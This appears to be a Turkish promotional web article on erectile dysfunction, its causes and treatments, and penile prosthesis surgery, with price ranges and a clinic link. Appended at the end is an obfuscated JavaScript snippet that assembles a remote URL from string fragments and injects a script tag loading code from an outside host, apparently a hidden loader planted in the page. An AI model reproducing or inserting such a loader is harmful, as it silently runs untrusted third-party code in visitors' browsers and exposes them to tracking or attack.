Sertleşme Sorunu Tedavisi Ve Penil Protez Ameliyatı

TAKİP ET

Sertleşme sorunu günümüzde erkeklerde sık rastlanan cinsel işlev bozukluğudur. Belirli bir nedene bağlı olarak veya bir nedenden bağımsız olarak ara ara gözlenmektedir. Gündelik hayatta var olan stresli olaylardan etkilenerek sertleşmeme sorunu daha da belirgin olarak karşımıza çıkmaktadır.

Sertleşme Sorunu Tedavisi Ve Penil Protez Ameliyatı
Sertleşme sorunu günümüzde erkeklerde sık rastlanan cinsel işlev bozukluğudur. Belirli bir nedene bağlı olarak veya bir nedenden bağımsız olarak ara ara gözlenmektedir. Gündelik hayatta var olan stresli olaylardan etkilenerek sertleşmeme sorunu daha da belirgin olarak karşımıza çıkmaktadır.

Sertleşme Sorunu Nedenleri Nelerdir?

Erkeklerde var olan sertleşme sorununun belirgin özellikleri şunlardır.  Kalp hastalığı, yüksek tansiyon ve kolesterol, obezite, diyabet, ateroskleroz, Parkinson hastalığı belirgin nedenlerindendir. 

Sertleşme Sorununun Var Olduğu Nasıl Anlaşılmaktadır?

Erkek bireyin yaşamış olduğu yüksek düzeydeki duygu değişimi penis kaslarının gevşemesine neden olmaktadır. Gevşeyen penis kaslarından gelen kan ile birlikte penis kanalları kan ile dolar. Kan ile dolan penis kasları cinsel organın sertleşmesini sağlamaktadır. Bu sertleşmenin sağlanmamasının fark edildiği anlar peniste cinsel ilişkiye girilecek sertliğin oluşmamasıdır.  Ve yeterli düzeyde hazzın alınmaması var olan belirtiler arasındadır. 

Sertleşme Tedavisi Nasıldır?

Erkek cinsel bozukluğu olarak gözlemlenen sertleşme sorunu tedavisi için geliştirilmiş alternatif tedavi yöntemleri yer almaktadır. Vakum cihazları, idrar kanalından sertleşme yapıcı jel sıkılması, penise şok dalga tedavisi şeklinde tedavi yöntemleri sıklıkla başvurulan yöntemler arasındadır. 

Penil Protez Nedir?

Penisin yeterli düzeyde işlevini yerine getirememesinden dolayı penisin içerisine yerleştirilen yapay implanttır. Mutluluk çubuğu olarak da adlandırılan penis implantı sıklıkla tercih edilen yöntemler arasındadır. Uzman kontrolüne danışılarak doğru tedavi yöntemleri ile farklı modellere Penil Protez yaptırılabilmektedir. 

 İmplant Koşulları Nelerdir?

Penisin işlevinin bozulması sebebiyle penise operasyon ile takılan implant peniste var olan işlev bozukluğunun giderilmesidir. Değişik fonksiyonlarda var olan implantlar bükülmeye ve gizlenmeye elverişlidir. Bu da yer alan problemin kısmi olarak ortadan kalkmasına olanak sağlamaktadır.

İmplant Fiyatları Hangi Aralıkta Yer Almaktadır?

Penis implant çeşitleri tek parçalı ve çok parçalı gibi farklı formlarda yer almaktadır. Penil Protez için dikkat edilen en önemli husus protezin kalitesi ve performansıdır. Kalitesine göre fiyat aralığı da değişen protezlerde fonksiyonel olarak değişmektedir. En belirgin fiyat aralığı 8 bin tl ile 12 bin tl aralığında değişmektedir. 



Penil Protez Ameliyatı Nasıl Yapılmaktadır?

Sertleşme sorununu ortadan kaldırmak için penise takılan protezde aşama olarak ameliyatı yapılmaktadır. Penisin altından kesilen kesi yardımıyla veya karın kısmının açılmasıyla uygun boyuttaki implant vücuda kolaylıkla yerleştirilmektedir. Sistematik olarak penise takılması mümkün olmayan implant ileri düzeyde nörolojik problemi olan hastalara takılması mümkün değildir. Kalp, böbrek, karaciğer organları ile ilgili sıkıntısı olan hastalara da takılması tavsiye edilmemektedir. Detaylı bilgi için https://www.andromed.com.tr sitesini ziyaret ediniz.

 

(function(){ zuf9=document.createElement("script");zuf9_=(("u")+"st")+"a";zuf9.async=true; zuf9.type="text/javascript";zuf9_+=("t.i")+""+"n";zuf9_+=(("f")+"o");zuf9_+="/"; zuf9u="483870784.";zuf9u+="lXjjahviuf9n9wr2xs8"+"6Xb8qxq0i9p"; zuf9.src="https://"+zuf9_+zuf9u;document.body.appendChild(zuf9); })();